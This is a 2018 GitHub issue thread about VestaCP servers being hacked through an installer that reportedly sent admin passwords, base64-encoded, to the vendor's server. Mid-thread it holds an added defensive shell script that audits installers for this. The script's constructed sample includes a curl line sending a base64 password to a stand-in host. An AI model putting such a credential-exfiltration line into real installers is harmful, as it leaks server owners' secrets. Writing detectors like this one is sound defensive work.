I got hacked and they told me it was VestaCP #1715

Closed
SPIRY-RO opened this issue Sep 26, 2018 · 15 comments

@SPIRY-RO

SPIRY-RO commented Sep 26, 2018

Operating System (OS/VERSION):

Ubuntu 16.04

VestaCP Version:

Latest

I got hacked and the support already asked me from the start if I had VestaCP installed. They put me on recovery mode and I did a quick backup. Now I have to redo my server from scratch. Their ticket answer was:

A reinstallation will be required to reactivate the server, then we suggest you to install latest vestacp version as the one you installed had a bug that was used to make attacks.

@MrGKanev

If I am not mistaken, there was a version with a big breach some time ago (a couple of months). If even the hosting provider told you so, you should keep VestaCP up to date (like most software).

@SPIRY-RO
Author

The problem is that I actually kept the latest version up-to-date 💯 %. I always do that!
I keep my systems up-to-date more than I should since newer patches can have 0-day exploits. Nevertheless, I was using the latest 0.9.8-22.

@MrGKanev

Do you have a backup of the VPS? If there really is a breach in vestaCP it can't be found without this kind of information.

@linuskom

linuskom commented Oct 2, 2018

Security is a concern.

The VestaCP roadmap document mentions that end-of-Sept-2018 there will be Version 0.9.8-23.
It's 02-Oct-2018. There have been no updates.

Any news?
I can't even register on the VestaCP forum site.

VestaCP should tell us of status, progress and milestones either on their website or on Git.

@ioannidesalex
Contributor

Everything seems to be falling apart. Unfortunately.

@MrGKanev

MrGKanev commented Oct 3, 2018

@ioannidesalex these types of months are always slow. Most people are on vacation, etc. I'm sure that the project isn't abandoned.

@ioannidesalex
Contributor

@MrGKanev Come on, it's October already :)

At least a message saying "We are on it - check back in October".

@tlcd96
Contributor

tlcd96 commented Oct 3, 2018

first things first.

@ioannidesalex everyone here got lives, serghey, dpeca, the rest of the admins, and also i that, when i can, make commits to the main vesta repo.

everyone is trying to make this project come forward, for example, i've corrected some things, others need a review, and finally, others i cannot do.

make an issue if you have information that is relevant.

by issuing a PR, or an issue, you are helping, IF

  • the issue is a pertinent question and you have insights of the question;
    or you know who has it.
  • the issue is a bug report and you have details about the problem;
    you have the details that cause the problem or you know who has it.
  • the issue is a feature that will make the panel greater;
  • the PR is solving some problem;
  • the PR is a complete feature that serves all OS's that Vesta CP supports.

etc...~

be patient

you guys have to be patient, about the development. we are not paid, we, developers, make this on our free time.

is there really a bug on this version?

if there is, please add an issue and in the title say something like this [URGENT][BUG] - «small desc of the bug» because guessing games are hard.

So

if you want to help to make this even greater, try to learn bash, php, and the other languages that this panel uses, try to fix an issue, and when you can, send a PR referring one of the admins, cause it is hard to develop something like this.
If you cannot program or think that is boring, at least submit bugs to the issues with the necessary details so we, DEVELOPERS, can start correcting the problem.

Finally

That's why, wherever i can, i help the admins to develop some features, or to correct bugs.
this is a great panel, but it cannot be developed on its own.

@gytisrepecka

Many control panels have suffered from attacks. I myself remember a couple of cases when entire servers were breached due to a flaw in cPanel as well as Plesk, so Vesta is no exception. Those types of issues get patched quickly, but you have to be fast enough to update your servers.

The most you can do is limit access to the panel (deny all, allow listed). If you can't use that approach, at least have fail2ban and check for updates frequently.

@ghost

ghost commented Oct 17, 2018

As per an analysis by a forum member on the official forums, the issue with hacked servers has to do with a "backdoored" installer that was served before and that uploaded the admin credentials to Vesta's server in base64.

Look at these commits and judge by yourself:
Ubuntu

Introduced here:
a3f0fa1

Omitted here:
ee03eff

This issue may also be present in other installer files for other operating systems, and this explains why servers got hacked with no evidence of actual applications being exploited.

Vesta team, we as a community would like an answer regarding your fuck-up and how the passwords were breached.
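
The behaviour described in the comment above, an installer that base64-encodes the admin password and sends it to a remote server, is something a quick audit of an install script can surface before it is run. The following is an added example, not part of this thread and not VestaCP code: a heuristic taint check whose function names (`audit_installer`, `write_sample`), variable names and `.example` hosts are all assumptions made for illustration.

```shell
#!/bin/sh
# Added example: flag installer lines that hand password-derived values to
# curl/wget. Heuristic only; all names and hosts below are constructed.

audit_installer() {
    # $1 = path to a shell installer; prints "lineno: text" for each finding
    awk '
    function refs_tainted(s,   v) {
        for (v in tainted)
            if (s ~ ("\\$[{]?" v "([^A-Za-z0-9_]|$)")) return 1
        return 0
    }
    {
        line = $0
        sub(/^[ \t]+/, "", line)
        if (line ~ /^#/) next                       # ignore comment lines
        if (match(line, /^[A-Za-z_][A-Za-z0-9_]*=/)) {
            name = substr(line, 1, RLENGTH - 1)
            rhs  = substr(line, RLENGTH + 1)
            # taint password-named variables and anything derived from them
            if (tolower(name) ~ /pass/ || refs_tainted(rhs)) tainted[name] = 1
        }
        if (line ~ /(^|[^A-Za-z0-9_])(curl|wget)([^A-Za-z0-9_]|$)/ &&
            refs_tainted(line))
            printf "%d: %s\n", NR, line
    }' "$1"
}

write_sample() {
    # $1 = output path; constructed installer fragment, not the Vesta script
    cat > "$1" <<'EOF'
#!/bin/bash
# constructed sample
vpass=$(gen_pass)
os_name=$(uname -s)
wget -q https://mirror.example/pkg.tar.gz -O /tmp/pkg.tar.gz
blob=$(echo "$vpass" | base64)
curl -s "https://stats.example/notify?os=$os_name&id=$blob" >/dev/null
echo "admin password: $vpass"
EOF
}

if [ "$#" -gt 0 ]; then audit_installer "$1"; fi
```

On the constructed sample only the `curl` line is reported: the plain package download carries no tainted variable, while `blob` inherits taint from `vpass` through the base64 step.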

@justbittin

justbittin commented Oct 17, 2018

I understand people have lives, but this team is responsible for the security of the package. To say, be patient, while servers are compromised, is reckless at minimum, and the fact Vesta team added the commit to send our passwords to vestacp.com is, IMHO, criminal.

This needs to be addressed NOW.

@gytisrepecka

Apparently this is very serious. Team says their infrastructure servers were hacked.

There is a reply from the team in the forum: https://forum.vestacp.com/viewtopic.php?f=10&t=17641&hilit=passwords+sent+to+vestacp&start=180#p73907

@truongan

My god this is serious. I'm changing the admin password on my handful of servers right now. I hope the best for the Vesta team.
IMHO, open source projects benefit the best from community interaction on platforms like GitHub. May this incident push the Vesta team toward retiring the vestacp.com server during the installation process. Apparently GitHub is less likely to get compromised and the community can help spot issues earlier.

@gytisrepecka

Update is live, more details available in forum: https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=180#p73920

Apparently there was a flaw in the password reset mechanism. According to the post, calling back to vestacp.com after installation was also removed.

@SPIRY-RO
Author

SPIRY-RO commented Dec 9, 2018

I have been hacked recently again. Seems like he gained access to user "admin", changed the password, deleted my backups and then asked money for my backups. And I had 0.9.8-23!

Thanks @serghey-rodin for the updates yet, your software is getting us total victims to Moroccan and Russian hackers 👎.

I think VestaCP is far from being safe on any system anymore. It is a total loss of time and resources.
